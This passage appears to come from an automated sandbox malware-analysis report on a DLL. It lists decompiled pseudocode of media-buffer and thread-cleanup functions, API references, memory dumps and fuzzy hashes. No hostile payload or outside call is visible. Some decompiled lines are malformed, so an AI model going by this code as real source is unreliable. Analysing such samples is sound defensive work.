				signed int _t106;
				signed char* _t110;
				signed char* _t112;
				void* _t113;
				signed char* _t115;
				signed int _t116;
				signed int _t117;
				signed char* _t118;
				signed int _t119;
				signed int _t121;
				signed char** _t123;

				_t97 = _t123[0x18];
				_t112 = _t123[0x19];
				if(_t97 > 0xb) {
					_t66 = 1;
				} else {
					_t100 =  *(0x100bc32c + (_t97 + _t97 * 4) * 4);
					_t66 =  !=  ? _t123[0x16] : 1;
				}
				 *_t123 = _t66;
				_t123[1] = 4;
				_t115 = E100266D0();
				 *(_t123[0x14]) = _t115;
				if(_t115 == 0) {
					_t123[0xb] = 0xfffffff4;
					goto L15;
				} else {
					_t123[4] = _t112;
					_t123[3] = _t97;
					 *_t123 = 0;
					_t123[2] = _t123[0x17];
					_t123[1] = _t123[0x16];
					_t72 = E1003A070(_t97, 4, _t112, _t115);
					_t123[0xb] = _t72;
					if(_t72 < 0) {
						L22:
						 *_t123 = _t123[0x14];
						E100265C0();
						return _t123[0xb];
					} else {
						 *_t123 = _t72;
						_t75 = E10026230();
						_t118 = _t75;
						if(_t75 == 0) {
							_t123[0xb] = 0xfffffff4;
							goto L22;
						} else {
							_t123[6] = _t112;
							_t123[5] = _t97;
							_t123[2] = _t118;
							 *_t123 = _t115;
							_t123[4] = _t123[0x17];
							_t123[3] = _t123[0x16];
							_t123[1] = _t123[0x15];
							_t79 = E1003A1B0();
							_t123[0xb] = _t79;
							if(_t79 < 0) {
								 *_t123 = _t118;
								L100265B0();
								goto L22;
							} else {
								if(_t97 > 0xb) {
									_t119 = 0;
									_t123[0x16] = 1;
									_t98 = 0;
									goto L9;
								} else {
									_t85 = (_t97 + _t97 * 4) * 4 + "u8";
									_t86 =  *(_t85 + 0xc);
									_t121 =  *(_t85 + 8) >> 3;
									if(_t86 == 0) {
										_t123[0x16] = 1;
										_t106 = _t123[0x17];
										_t119 = _t121 * _t123[0x16] * _t106;
										_t98 = ((_t86 & 0xffffff00 | _t97 == 0x00000005 | _t106 & 0xffffff00 | _t97 == 0x00000000) & 0x000000ff) << 7;
										goto L9;
									} else {
										_t91 = _t123[0x17];
										_t119 = _t121 * _t91;
										_t98 = ((_t91 & 0xffffff00 | _t97 == 0x00000000 | _t100 & 0xffffff00 | _t97 == 0x00000005) & 0x000000ff) << 7;
										if(_t123[0x16] > 0) {
											L9:
											_t110 = _t115;
											_t123[0xa] = _t115 + _t123[0x16] * 4;
											_t83 = _t98 * 0x1010101;
											do {
												_t101 =  *_t110;
												_t116 = _t119;
												_t113 = _t101;
												if(_t119 >= 8) {
													if((_t101 & 0x00000001) != 0) {
														 *_t101 = _t83;
														_t56 = _t119 - 1; // -1
														_t116 = _t56;
														_t113 = _t113 + 1;
													}
													if((_t113 & 0x00000002) != 0) {
														 *_t113 = _t83;
														_t116 = _t116 - 2;
														_t113 = _t113 + 2;
													}
													if((_t113 & 0x00000004) != 0) {
														 *_t113 = _t83;
														_t116 = _t116 - 4;
														_t113 = _t113 + 4;
													}
													_t102 = _t116;
													_t116 = _t116 & 0x00000003;
													_t103 = _t102 >> 2;
													_t83 = memset(_t113, _t83, _t103 << 2);
													_t123 =  &(_t123[3]);
													_t113 = _t113 + _t103;
												}
												_t117 = _t116 & 0x00000007;
												if(_t117 != 0) {
													_t105 = 0;
													do {
														 *(_t113 + _t105) = _t98;
														_t105 = _t105 + 1;
													} while (_t105 < _t117);
												}
												_t110 =  &(_t110[4]);
											} while (_t123[0xa] != _t110);
										}
									}
								}
								L15:
								return _t123[0xb];
							}
						}
					}
				}
			}

0x1003a4f7
0x1003a4fb
0x1003a502
0x1003a678
0x1003a508
0x1003a50b
0x1003a519
0x1003a519
0x1003a51e
0x1003a526
0x1003a52f
0x1003a537
0x1003a539
0x1003a731
0x00000000
0x1003a53f
0x1003a53f
0x1003a547
0x1003a54b
0x1003a552
0x1003a55a
0x1003a55e
0x1003a563
0x1003a569
0x1003a690
0x1003a694
0x1003a697
0x1003a6a7
0x1003a56f
0x1003a56f
0x1003a572
0x1003a579
0x1003a57b
0x1003a73e
0x00000000
0x1003a581
0x1003a581
0x1003a589
0x1003a58d
0x1003a591
0x1003a594
0x1003a59c
0x1003a5a4
0x1003a5a8
0x1003a5ad
0x1003a5b3
0x1003a688
0x1003a68b
0x00000000
0x1003a5b9
0x1003a5bc
0x1003a6b5
0x1003a6b7
0x1003a6bb
0x00000000
0x1003a5c2
0x1003a5c5
0x1003a5cf
0x1003a5d2
0x1003a5d7
0x1003a709
0x1003a70d
0x1003a714
0x1003a72a
0x00000000
0x1003a5dd
0x1003a5dd
0x1003a5e1
0x1003a5f8
0x1003a5fd
0x1003a5ff
0x1003a603
0x1003a608
0x1003a60c
0x1003a620
0x1003a620
0x1003a625
0x1003a627
0x1003a629
0x1003a653
0x1003a6f0
0x1003a6f2
0x1003a6f2
0x1003a6f5
0x1003a6f5
0x1003a65f
0x1003a6d8
0x1003a6db
0x1003a6de
0x1003a6de
0x1003a667
0x1003a6c8
0x1003a6ca
0x1003a6cd
0x1003a6cd
0x1003a669
0x1003a66b
0x1003a66e
0x1003a671
0x1003a671
0x1003a671
0x1003a671
0x1003a62b
0x1003a62e
0x1003a630
0x1003a632
0x1003a632
0x1003a635
0x1003a636
0x1003a632
0x1003a63a
0x1003a63d
0x1003a620
0x1003a5fd
0x1003a5d7
0x1003a643
0x1003a64e
0x1003a64e
0x1003a5b3
0x1003a57b
0x1003a569

APIs

mv_calloc.MAIN ref: 1003A52A
mv_samples_get_buffer_size.MAIN ref: 1003A55E
mv_malloc.MAIN ref: 1003A572
mv_samples_fill_arrays.MAIN ref: 1003A5A8

Part of subcall function 1003A1B0: mv_samples_get_buffer_size.MAIN ref: 1003A201

mv_freep.MAIN ref: 1003A697

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_samples_get_buffer_size$mv_callocmv_freepmv_mallocmv_samples_fill_arrays
String ID:
API String ID: 3785048109-0
Opcode ID: 5ae1779f3f7e2cdb2b331e1be93d4aeac89c33ba1fb156b6b974ba19d1fc6e91
Instruction ID: bcd7097c64c988b962d1b439634854989dd960b0eefa7e233943bcd087631235
Opcode Fuzzy Hash: 5ae1779f3f7e2cdb2b331e1be93d4aeac89c33ba1fb156b6b974ba19d1fc6e91
Instruction Fuzzy Hash: E3518E75E087418FC701CF69D4C160AFBE4EF86395F56492EE8848B360E375E985CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1002C140 Relevance: 9.1, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 1002C201
strcmp.MSVCRT ref: 1002C21F
strcmp.MSVCRT ref: 1002C249
mv_opt_find2.MAIN ref: 1002C323

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp$mv_opt_find2
String ID:
API String ID: 3181049271-0
Opcode ID: 04fd4d9bdf331594b408d4ec8202b0f2e6e9772fccb4101c97f8bf67926a7e0f
Instruction ID: 5aa1348898b91abb05038d254fdb3b78ff7920596d5d7f99927f5e0623b01fd6
Opcode Fuzzy Hash: 04fd4d9bdf331594b408d4ec8202b0f2e6e9772fccb4101c97f8bf67926a7e0f
Instruction Fuzzy Hash: 1441C57460834DCBCB50DEE5A580A5BB7E4EF857C4F85882DEC9887211EB74EC49DB81

Uniqueness

Uniqueness Score: -1.00%

Function 1001C210 Relevance: 9.1, APIs: 6, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E1001C210(signed char _a4) {
				char _v60;
				intOrPtr _v116;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				char _v404;
				intOrPtr _v420;
				signed char _v424;
				intOrPtr _t49;
				signed int _t50;
				void* _t59;
				intOrPtr _t63;
				void* _t67;
				void* _t69;
				void* _t72;
				signed int _t76;
				signed char _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed char _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				void* _t98;
				intOrPtr* _t99;

				_t99 = _t98 - 0x19c;
				_t93 = _a4;
				_t49 =  *((intOrPtr*)(_t93 + 0xb8));
				if(_t49 == 0) {
					L10:
					_t82 =  &_v404;
					_t50 = 0;
					do {
						 *((intOrPtr*)(_t82 + _t50)) = 0;
						 *((intOrPtr*)(_t82 + _t50 + 4)) = 0;
						_t50 = _t50 + 8;
					} while (_t50 < 0x178);
					_v324 =  *((intOrPtr*)(_t93 + 0x50));
					_v224 =  *((intOrPtr*)(_t93 + 0xb4));
					_v336 =  *((intOrPtr*)(_t93 + 0x44));
					_v332 =  *((intOrPtr*)(_t93 + 0x48));
					_v116 =  *((intOrPtr*)(_t93 + 0x120));
					_v228 =  *((intOrPtr*)(_t93 + 0xb0));
					_v328 =  *((intOrPtr*)(_t93 + 0x4c));
					_v424 = _t93 + 0x158;
					 *_t99 =  &_v60;
					_t59 = E1000D340();
					_t94 = _t59;
					if(_t59 < 0) {
						L24:
						E1001A460(_t82);
						return _t94;
					} else {
						_t63 =  *((intOrPtr*)(_t93 + 0x128));
						if(_t63 == 0) {
							 *_t99 = _t82;
							_v424 = 0;
							_t95 = L1001ADF0();
						} else {
							_v424 = _t82;
							_v420 = 0;
							 *_t99 = _t63;
							_t95 = E1001E2F0();
						}
						if(_t95 < 0) {
							goto L23;
						} else {
							_v424 = _t93;
							 *_t99 = _t82;
							_t67 = L1001B8D0();
							_t118 = _t67;
							_t94 = _t67;
							if(_t67 < 0) {
								goto L24;
							} else {
								_t69 = E1001A6C0(_t82, 1, _t93, _t118);
								_t94 = _t69;
								if(_t69 < 0) {
									goto L24;
								} else {
									E1001A460(_t93);
									_t72 = 0;
									do {
										 *((intOrPtr*)(_t93 + _t72)) =  *((intOrPtr*)(_t99 + _t72 + 0x18));
										 *((intOrPtr*)(_t93 + _t72 + 4)) =  *((intOrPtr*)(_t99 + _t72 + 0x1c));
										_t72 = _t72 + 8;
									} while (_t72 < 0x178);
									if(_v340 == _t82) {
										 *((intOrPtr*)(_t93 + 0x40)) = _t93;
									}
									goto L22;
								}
							}
						}
					}
				} else {
					_t83 = _t93 + 0xbc;
					_t96 = 1;
					_t97 = _t93 + 0xd8;
					L3:
					L3:
					if(_t49 != 0) {
						 *_t99 = _t49;
						_t96 = _t96 & (E1000A070() & 0xffffff00 | _t79 != 0x00000000) & 0x000000ff;
					}
					if(_t83 != _t97) {
						goto L2;
					}
					if( *((intOrPtr*)(_t93 + 0xdc)) > 0) {
						_t84 = 0;
						do {
							 *_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0xd8)) + _t84 * 4));
							_t76 = E1000A070();
							_t84 = _t84 + 1;
							_t96 = _t96 & (_t76 & 0xffffff00 | _t76 != 0x00000000) & 0x000000ff;
						} while (_t84 <  *((intOrPtr*)(_t93 + 0xdc)));
					}
					if(_t96 != 0) {
						L22:
						_t95 = 0;
						L23:
						return _t95;
					} else {
						goto L10;
					}
					goto L26;
					L2:
					_t49 =  *_t83;
					_t83 = _t83 + 4;
					__eflags = _t83;
					goto L3;
				}
				L26:
			}

0x1001c214
0x1001c21a
0x1001c221
0x1001c229
0x1001c29c
0x1001c29c
0x1001c2a2
0x1001c2a4
0x1001c2a4
0x1001c2a7
0x1001c2ab
0x1001c2ae
0x1001c2be
0x1001c2c5
0x1001c2cc
0x1001c2d3
0x1001c2dd
0x1001c2ea
0x1001c2f4
0x1001c2fe
0x1001c309
0x1001c30c
0x1001c313
0x1001c315
0x1001c3b0
0x1001c3b2
0x1001c3c3
0x1001c31b
0x1001c31b
0x1001c323
0x1001c3c8
0x1001c3cd
0x1001c3d6
0x1001c329
0x1001c329
0x1001c32f
0x1001c333
0x1001c33b
0x1001c33b
0x1001c33f
0x00000000
0x1001c341
0x1001c341
0x1001c345
0x1001c348
0x1001c34d
0x1001c34f
0x1001c351
0x00000000
0x1001c353
0x1001c35c
0x1001c363
0x1001c365
0x00000000
0x1001c367
0x1001c369
0x1001c36e
0x1001c370
0x1001c378
0x1001c37b
0x1001c37f
0x1001c382
0x1001c38d
0x1001c38f
0x1001c38f
0x00000000
0x1001c38d
0x1001c365
0x1001c351
0x1001c33f
0x1001c22b
0x1001c22b
0x1001c231
0x1001c236
0x00000000
0x1001c245
0x1001c247
0x1001c249
0x1001c259
0x1001c259
0x1001c25d
0x00000000
0x00000000
0x1001c267
0x1001c269
0x1001c270
0x1001c279
0x1001c27c
0x1001c286
0x1001c28a
0x1001c28c
0x1001c270
0x1001c296
0x1001c3a0
0x1001c3a0
0x1001c3a2
0x1001c3ae
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c240
0x1001c240
0x1001c242
0x1001c242
0x00000000
0x1001c242
0x00000000

APIs

mv_buffer_is_writable.MAIN ref: 1001C24C
mv_buffer_is_writable.MAIN ref: 1001C27C
mv_channel_layout_copy.MAIN ref: 1001C30C
mv_hwframe_get_buffer.MAIN ref: 1001C336
mv_frame_copy.MAIN ref: 1001C348

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_is_writable$mv_channel_layout_copymv_frame_copymv_hwframe_get_buffer
String ID:
API String ID: 1431812533-0
Opcode ID: 364bd59554279b40aee4642812e1f726182608b2a75209079b3376af4345f371
Instruction ID: eaf454bc14f92c14001bd62492fec0c564a2a00f258074e35efd3c86292710f4
Opcode Fuzzy Hash: 364bd59554279b40aee4642812e1f726182608b2a75209079b3376af4345f371
Instruction Fuzzy Hash: 46514B75A047168BD354CF79C880B9AF7E4FF88350F018A2AE999CB301E734E8948B91

Uniqueness

Uniqueness Score: -1.00%

Function 1008E250 Relevance: 9.1, APIs: 6, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 1008E27F
vfprintf.MSVCRT ref: 1008E29F
abort.MSVCRT ref: 1008E2A4
VirtualQuery.KERNEL32 ref: 1008E33B

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID:
API String ID: 2513968241-0
Opcode ID: 77f9c74a023bead4244158e4538434e8ac340feeaea4348980fb076ccdbc421e
Instruction ID: 54ad2b6e83e5b16b79a45a6593ed35e006b5b48100f64ca54a0057f1c503df76
Opcode Fuzzy Hash: 77f9c74a023bead4244158e4538434e8ac340feeaea4348980fb076ccdbc421e
Instruction Fuzzy Hash: E0514BB59053519FC700EF68C98965AFBE4FF84354F42C92EE8988B226D734E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10001020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,10001281,?,?,?,?,?,?,100013AE), ref: 10001057
_amsg_exit.MSVCRT ref: 10001086

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: d59ae3628b0237ba56fdd7c9d317007903976593300e79648f20ecf33c672c95
Instruction ID: dd64dd1eda1eb68cef0d792f916db726e673d7e5cc478cdb0012762ac5c84acb
Opcode Fuzzy Hash: d59ae3628b0237ba56fdd7c9d317007903976593300e79648f20ecf33c672c95
Instruction Fuzzy Hash: 1A31A374609651CBE310EF54C9C438A7BE1FB483C0F52482DE9848B76DD7B9D884DB82

Uniqueness

Uniqueness Score: -1.00%

Function 1004A200 Relevance: 9.1, APIs: 6, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E1004A200() {
				signed int __ebx;
				void __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				intOrPtr* _t24;
				void* _t36;
				void* _t37;

				_t37 = _t36 - 0x2c;
				if( *((intOrPtr*)(_t37 + 0x40)) != 0) {
					__edi =  *__edx;
					if(__edi != 0) {
						__eax =  *(__edi + 4);
						if( *((intOrPtr*)(__edi + 0x30)) == 0) {
							__eax = __eax - 1;
						}
						 *((intOrPtr*)(__edi + 0x24)) = 1;
						if(__eax <= 0) {
							L13:
							 *__esp = __edi;
							__esp[6] = __edx;
							L1();
							__edx = __esp[6];
							__esp[0x10] = __esp[6];
							__esp =  &(__esp[0xb]);
							_pop(__ebx);
							_pop(__esi);
							_pop(__edi);
							_pop(__ebp);
							_t24 =  *((intOrPtr*)(_t37 + 4));
							 *_t24 = 0;
							 *((intOrPtr*)(_t37 + 4)) =  *_t24;
							return __imp___aligned_free();
						} else {
							__esp[6] = __eax;
							__ebp = 0;
							__esp[7] = __edx;
							do {
								__eax =  *__edi;
								__ebp = __ebp << 5;
								_t9 = (__ebp << 5) +  *__edi + 4; // 0x4
								__esi = _t9;
								__ebx = (__ebp << 5) +  *__edi + 8;
								 *__esp = __esi;
								L1009DE58();
								 *((intOrPtr*)(__ebx + 0x14)) = 0;
								__esp = __esp - 4;
								 *__esp = __ebx;
								__imp__WakeConditionVariable();
								__esp = __esp - 4;
								 *__esp = __esi;
								L1009DE50();
								__edx = __ebp;
								__ebp = __ebp + 1;
								__esp = __esp - 4;
							} while (__esp[6] != __ebp);
							__esi = __edx;
							__edx = __esp[7];
							__ebx = 0;
							__esp[6] = __esp[7];
							while(1) {
								__edx =  *__edi;
								__ebx = __ebx << 5;
								__eax = (__ebx << 5) +  *__edi;
								__ebp =  *((__ebx << 5) +  *__edi + 0xc);
								__eax = 0xffffffff;
								__eax = WaitForSingleObjectEx(__ebp, 0xffffffff, 0);
								__esp = __esp - 0xc;
								if(__eax == 0) {
									__eax = CloseHandle(__ebp);
									__esp = __esp - 4;
								}
								_t18 = __ebx + 1; // 0x1
								__eax = _t18;
								if(__ebx == __esi) {
									break;
								}
								__ebx = __eax;
							}
							__edx = __esp[6];
							goto L13;
						}
					}
				}
				return _t23;
			}

0x1004a204
0x1004a20d
0x1004a213
0x1004a217
0x1004a220
0x1004a225
0x1004a310
0x1004a310
0x1004a22b
0x1004a234
0x1004a2ec
0x1004a2ec
0x1004a2ef
0x1004a2f3
0x1004a2f8
0x1004a2fc
0x1004a300
0x1004a303
0x1004a304
0x1004a305
0x1004a306
0x100265c0
0x100265c6
0x100265cc
0x100265d0
0x1004a23a
0x1004a23a
0x1004a23e
0x1004a240
0x1004a250
0x1004a250
0x1004a254
0x1004a259
0x1004a259
0x1004a25c
0x1004a25f
0x1004a262
0x1004a267
0x1004a26e
0x1004a271
0x1004a274
0x1004a27a
0x1004a27d
0x1004a280
0x1004a285
0x1004a287
0x1004a28a
0x1004a28d
0x1004a293
0x1004a295
0x1004a299
0x1004a29b
0x1004a2aa
0x1004a2aa
0x1004a2b0
0x1004a2b3
0x1004a2b5
0x1004a2b8
0x1004a2c8
0x1004a2ce
0x1004a2d3
0x1004a2d8
0x1004a2de
0x1004a2de
0x1004a2e1
0x1004a2e1
0x1004a2e6
0x00000000
0x00000000
0x1004a2a8
0x1004a2a8
0x1004a2e8
0x00000000
0x1004a2e8
0x1004a234
0x1004a217
0x1004a327

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 1004A262
WakeConditionVariable.KERNEL32 ref: 1004A274
ReleaseSRWLockExclusive.KERNEL32 ref: 1004A280
WaitForSingleObjectEx.KERNEL32 ref: 1004A2C8
CloseHandle.KERNEL32 ref: 1004A2D8
mv_freep.MAIN ref: 1004A2F3

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$AcquireCloseConditionHandleObjectReleaseSingleVariableWaitWakemv_freep
String ID:
API String ID: 1841216690-0
Opcode ID: 18bc572b1c8a2e61cb34bfd6f4b1ef9c865d202ec6cb55ee2b061ed66f55e34f
Instruction ID: 3180a2c82765ffdb0d0e9836089f8425691ac15bb4143a1306c626e3471b16ad
Opcode Fuzzy Hash: 18bc572b1c8a2e61cb34bfd6f4b1ef9c865d202ec6cb55ee2b061ed66f55e34f
Instruction Fuzzy Hash: 34317EB26047058FD304EF68D98420BBBE1FF85290F61853DE85987205E331E999CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 1000E173 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 1000DF70
mv_channel_layout_from_mask.MAIN ref: 1000E046
mv_freep.MAIN ref: 1000E17B

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_channel_layout_from_maskmv_freepstrcmp
String ID:
API String ID: 3576703362-0
Opcode ID: 2b02768f874b8c8628ca8c24d3a244cf9eff547c0ef362d73473bb9b13f20ec1
Instruction ID: 3232a43fc97f47c23ab915f7ee9f6b07ea90700946469634bd9b1ff3e7b05c00
Opcode Fuzzy Hash: 2b02768f874b8c8628ca8c24d3a244cf9eff547c0ef362d73473bb9b13f20ec1
Instruction Fuzzy Hash: 9C313871A087819FE340DF25D48061EBBE1EF88394F52982EF98997318DB71EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1004A30C Relevance: 9.1, APIs: 6, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E1004A30C() {
				intOrPtr* _t20;
				void* _t23;

				__eax = __eax - 1;
				__edi[9] = 1;
				if(__eax <= 0) {
					L11:
					 *__esp = __edi;
					__esp[6] = __edx;
					L1();
					__edx = __esp[6];
					__esp[0x10] = __esp[6];
					__esp =  &(__esp[0xb]);
					_pop(__ebx);
					_pop(__esi);
					_pop(__edi);
					_pop(__ebp);
					_t20 =  *((intOrPtr*)(_t23 + 4));
					 *_t20 = 0;
					 *((intOrPtr*)(_t23 + 4)) =  *_t20;
					return __imp___aligned_free();
				}
				__esp[6] = __eax;
				__ebp = 0;
				__esp[7] = __edx;
				do {
					__eax =  *__edi;
					__ebp = __ebp << 5;
					_t6 = (__ebp << 5) +  *__edi + 4; // 0x4
					__esi = _t6;
					__ebx = (__ebp << 5) +  *__edi + 8;
					 *__esp = __esi;
					L1009DE58();
					 *((intOrPtr*)(__ebx + 0x14)) = 0;
					__esp = __esp - 4;
					 *__esp = __ebx;
					__imp__WakeConditionVariable();
					__esp = __esp - 4;
					 *__esp = __esi;
					L1009DE50();
					__edx = __ebp;
					__ebp = __ebp + 1;
					__esp = __esp - 4;
				} while (__esp[6] != __ebp);
				__esi = __edx;
				__edx = __esp[7];
				__ebx = 0;
				__esp[6] = __esp[7];
				while(1) {
					__edx =  *__edi;
					__ebx = __ebx << 5;
					__eax = (__ebx << 5) +  *__edi;
					__ebp =  *((__ebx << 5) +  *__edi + 0xc);
					__eax = 0xffffffff;
					__eax = WaitForSingleObjectEx(__ebp, 0xffffffff, 0);
					__esp = __esp - 0xc;
					if(__eax == 0) {
						__eax = CloseHandle(__ebp);
						__esp = __esp - 4;
					}
					_t15 = __ebx + 1; // 0x1
					__eax = _t15;
					if(__ebx != __esi) {
						__ebx = __eax;
						continue;
					}
					__edx = __esp[6];
					goto L11;
				}
			}

0x1004a310
0x1004a22b
0x1004a234
0x1004a2ec
0x1004a2ec
0x1004a2ef
0x1004a2f3
0x1004a2f8
0x1004a2fc
0x1004a300
0x1004a303
